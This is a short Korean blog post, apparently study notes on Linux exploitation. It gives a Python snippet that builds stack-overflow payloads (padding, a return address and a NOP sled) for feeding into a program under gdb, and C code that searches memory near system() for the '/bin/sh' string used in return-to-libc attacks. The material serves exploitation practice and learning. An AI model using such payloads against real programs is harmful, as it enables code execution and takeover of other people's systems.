먼저 test.py 파일을 만든다.

payload = ["", "", ""]

payload[0] += "A"*40 + L_E(0x0804854a) + "AAAA"
payload[1] += "A"*40 + L_E(0x0804854a) + "AAAA"
payload[2] += "AAAA" + "\x90"*4 + "ABCD"*8

for p in payload:
    print p

그 뒤 python test.py > test 라는 파일을 만들어 주고

gdb 내에서 r 시킬 때 r <test 로 진행 가능하다.

'System hacking > linux exploit 관련' 카테고리의 다른 글

checksec 사용  (0) 2016.05.27
file 디스크립터(다른 프로세스 간 통신)  (0) 2016.03.09
gdb 내 값 전달  (0) 2016.03.08
C언어 주소 값 brute force 방법  (0) 2016.01.05
libc bin/sh 찾기 소스  (0) 2015.12.18
아래의 소스를 이용한다.

#include <stdio.h>

int main()
{
        long shell= 0x40058ae0; //system 함수의 주소

        while(memcmp((void*)shell, "/bin/sh", 8)) //system함수의 주소에서 8바이트씩 /bin/sh를 비교해서 찾는다.
                shell++; //못찾으면 다음 주소로

        printf("/bin/sh = %p\n",shell); //"/bin/sh" 주소 출력

}



+ Recent posts